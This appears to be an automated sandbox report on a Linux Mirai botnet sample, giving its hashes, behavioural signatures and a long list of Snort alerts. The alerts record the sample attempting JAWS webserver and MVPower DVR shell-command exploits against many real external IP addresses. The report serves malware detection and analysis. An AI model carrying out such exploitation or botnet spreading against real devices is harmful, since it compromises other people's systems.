Linux Analysis Report
file1

Overview

General Information

Sample Name: file1
Analysis ID: 575100
MD5: c343f34198cdb0656394f0541c3b1880
SHA1: 481c79fcd0b01ef4c614624c1261faca18bdd49c
SHA256: b89d919623f76162795f14a8dcf49159e102e7c7715ce3517ce66c88d7cea1e3
Infos:

Detection

Mirai
Score: 96
Range: 0 - 100
Whitelisted: false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Sample tries to kill multiple processes (SIGKILL)
Performs DNS queries to domains with low reputation
Yara signature match
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Detected TCP or UDP traffic on non-standard ports
Sample tries to kill a process (SIGKILL)
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Creates hidden files and/or directories
Sample has stripped symbol table
HTTP GET or POST without a user agent
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: file1 Metadefender: Detection: 52% Perma Link
Source: file1 ReversingLabs: Detection: 71%
Machine Learning detection for sample
Source: file1 Joe Sandbox ML: detected

Networking
barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56470 -> 97.65.142.24:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47592 -> 140.106.235.102:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39896 -> 184.85.12.49:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56470 -> 97.65.142.24:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.85.12.49:80 -> 192.168.2.23:39896
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44608 -> 12.49.90.66:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50530 -> 5.196.5.36:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48962 -> 141.94.132.218:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56170 -> 77.48.35.75:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53906 -> 2.23.77.199:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50530 -> 5.196.5.36:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48962 -> 141.94.132.218:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 2.23.77.199:80 -> 192.168.2.23:53906
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53906 -> 2.23.77.199:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47030 -> 46.225.97.191:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47030 -> 46.225.97.191:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51324 -> 163.191.23.170:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55736 -> 37.97.167.163:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43484 -> 185.65.54.99:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43484 -> 185.65.54.99:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33404 -> 18.168.233.153:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53990 -> 95.214.169.25:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54026 -> 18.184.93.181:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54026 -> 18.184.93.181:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49898 -> 95.101.162.205:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33572 -> 176.58.96.244:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41540 -> 35.199.37.87:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.162.205:80 -> 192.168.2.23:49898
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37356 -> 91.80.135.73:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60252 -> 13.232.138.38:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34356 -> 104.72.142.62:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.72.142.62:80 -> 192.168.2.23:34356
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37356 -> 91.80.135.73:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45942 -> 103.97.200.111:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52436 -> 159.65.239.204:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56860 -> 66.70.175.60:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46394 -> 137.59.52.141:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42696 -> 210.79.31.222:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42078 -> 104.20.223.118:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33740 -> 89.161.251.102:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42078 -> 104.20.223.118:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33740 -> 89.161.251.102:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60506 -> 98.7.66.124:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55326 -> 23.63.33.212:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55450 -> 168.206.255.172:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60506 -> 98.7.66.124:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.63.33.212:80 -> 192.168.2.23:55326
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55450 -> 168.206.255.172:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50134 -> 104.20.192.248:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50134 -> 104.20.192.248:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57908 -> 172.67.190.90:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39666 -> 31.47.77.170:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57908 -> 172.67.190.90:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56716 -> 52.71.50.159:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55616 -> 65.19.162.18:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57986 -> 35.165.181.163:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34076 -> 163.191.220.226:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55306 -> 103.7.100.5:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55306 -> 103.7.100.5:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58832 -> 193.34.145.220:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60186 -> 194.186.95.50:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33534 -> 164.90.131.134:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60186 -> 194.186.95.50:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59716 -> 23.204.251.150:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40558 -> 209.232.145.6:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44490 -> 38.103.143.71:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33534 -> 164.90.131.134:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41280 -> 104.114.9.144:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.204.251.150:80 -> 192.168.2.23:59716
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47364 -> 64.227.101.121:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.114.9.144:80 -> 192.168.2.23:41280
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60474 -> 95.111.198.139:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59440 -> 104.145.251.2:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59440 -> 104.145.251.2:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41102 -> 150.60.98.157:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35496 -> 216.59.41.199:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35496 -> 216.59.41.199:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54772 -> 2.60.113.186:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60602 -> 163.191.76.105:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34000 -> 58.97.48.172:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43312 -> 76.204.134.3:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41912 -> 223.134.2.89:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48260 -> 36.3.56.198:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54074 -> 104.116.68.242:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.116.68.242:80 -> 192.168.2.23:54074
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51720 -> 209.124.46.155:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46292 -> 45.82.72.125:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42576 -> 173.223.252.184:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 173.223.252.184:80 -> 192.168.2.23:42576
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40392 -> 38.40.137.236:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53126 -> 13.251.84.58:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42418 -> 154.22.218.42:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40186 -> 54.199.151.26:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35590 -> 200.127.180.62:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40392 -> 38.40.137.236:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42418 -> 154.22.218.42:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58984 -> 104.80.144.244:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36056 -> 104.85.227.108:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40186 -> 54.199.151.26:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35590 -> 200.127.180.62:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.80.144.244:80 -> 192.168.2.23:58984
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.85.227.108:80 -> 192.168.2.23:36056
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44698 -> 34.96.89.222:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48992 -> 208.100.18.98:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58184 -> 162.247.79.35:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52254 -> 23.14.115.240:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37308 -> 138.68.14.149:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.14.115.240:80 -> 192.168.2.23:52254
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 208.100.18.98:80 -> 192.168.2.23:48992
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53938 -> 111.118.186.46:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60156 -> 202.212.206.81:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46856 -> 23.62.93.236:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59008 -> 23.80.17.107:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37066 -> 198.105.127.82:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60156 -> 202.212.206.81:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.62.93.236:80 -> 192.168.2.23:46856
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55958 -> 79.141.174.115:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34296 -> 23.51.122.210:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.51.122.210:80 -> 192.168.2.23:34296
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49596 -> 78.186.182.66:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39150 -> 200.60.190.23:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49596 -> 78.186.182.66:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43856 -> 35.244.139.154:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57948 -> 52.127.101.5:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42816 -> 12.10.87.14:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60880 -> 23.35.171.209:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35600 -> 174.90.249.169:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 200.60.190.23:80 -> 192.168.2.23:39150
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39084 -> 149.28.97.40:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42816 -> 12.10.87.14:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.35.171.209:80 -> 192.168.2.23:60880
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60880 -> 23.35.171.209:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54002 -> 177.73.249.151:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49168 -> 104.252.39.254:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35600 -> 174.90.249.169:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42370 -> 134.236.179.23:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54002 -> 177.73.249.151:80
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 211.231.7.229:23 -> 192.168.2.23:59440
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 211.231.7.229:23 -> 192.168.2.23:59440
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48826 -> 54.37.85.207:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42230 -> 80.77.145.22:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43612 -> 54.88.8.84:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59578 -> 157.241.1.175:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52100 -> 154.216.126.109:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54654 -> 47.74.84.26:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59578 -> 157.241.1.175:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51944 -> 168.76.47.94:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47128 -> 68.232.45.241:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54654 -> 47.74.84.26:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42292 -> 184.24.225.229:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55074 -> 42.29.36.152:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34624 -> 142.250.27.165:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47756 -> 91.212.215.53:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.24.225.229:80 -> 192.168.2.23:42292
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42292 -> 184.24.225.229:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58520 -> 216.183.156.185:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59772 -> 103.27.177.191:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58002 -> 23.8.48.163:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.8.48.163:80 -> 192.168.2.23:58002
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36636 -> 104.19.237.238:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49624 -> 94.130.226.99:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36636 -> 104.19.237.238:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57460 -> 23.250.0.235:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46060 -> 178.90.147.37:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42834 -> 54.85.156.204:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46060 -> 178.90.147.37:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54394 -> 107.15.250.189:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42834 -> 54.85.156.204:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33046 -> 23.48.236.56:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38802 -> 49.212.164.218:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56350 -> 103.117.180.83:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.48.236.56:80 -> 192.168.2.23:33046
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55134 -> 142.93.99.116:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38578 -> 34.110.141.231:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43838 -> 23.205.245.192:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.205.245.192:80 -> 192.168.2.23:43838
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43838 -> 23.205.245.192:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48508 -> 193.238.246.54:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49668 -> 213.151.56.65:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55394 -> 72.12.132.6:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34118 -> 151.121.77.147:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49668 -> 213.151.56.65:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44254 -> 45.60.152.154:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58596 -> 52.220.240.243:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33696 -> 23.222.154.108:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48608 -> 184.171.102.54:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36784 -> 23.220.75.159:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55394 -> 72.12.132.6:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44254 -> 45.60.152.154:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.222.154.108:80 -> 192.168.2.23:33696
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33696 -> 23.222.154.108:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54472 -> 107.15.250.189:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.220.75.159:80 -> 192.168.2.23:36784
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36784 -> 23.220.75.159:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54472 -> 107.15.250.189:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41770 -> 192.142.100.20:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42252 -> 92.242.186.78:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37764 -> 40.122.33.50:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54528 -> 107.15.250.189:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47080 -> 206.116.44.156:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39984 -> 66.228.47.134:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41770 -> 192.142.100.20:80
